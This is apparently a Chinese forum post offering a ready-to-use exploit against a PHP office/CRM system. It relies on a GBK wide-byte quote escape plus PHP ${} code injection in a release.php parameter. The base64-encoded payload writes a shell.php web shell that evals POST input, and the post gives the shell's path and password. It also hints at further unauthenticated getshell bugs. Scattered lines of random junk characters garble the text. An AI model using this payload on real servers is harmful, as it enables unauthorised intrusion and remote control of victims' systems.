此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
6 m- l& }/ \' W X* ?4 H/ Z+ \
2 V: G. G$ b+ e- t# q
$ E7 r$ L X6 ? v4 i9 f' m& JEXP:
' H9 |! t' r* H1 w6 C$ F: p 1 ?/ v$ X0 ^+ ?" W% q
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
8 E6 V* R- Z. ?
* v' l9 l: G! v: O& J第二步: [GET]http://site/general/email/index.php5 A( g0 z2 b- b x1 ^2 V
& k, ^2 g ~6 l: T' v9 B/ R( ASHELL: http://site/general/email/shell.php 密码C9 d) M" D% o# c- P4 g" |( ~# }, s
4 Z- j% q8 ]- s' _: P, N! p k ( L" v7 s) F9 V
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好& h; Q* Y! |3 e( A' _' G
5 i0 \0 P5 Y2 D4 M q
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~% H3 x7 X8 u+ M# k; a
3 J! b4 t, K' @0 Z
1 ~3 }$ c& X. @+ K3 v$ R |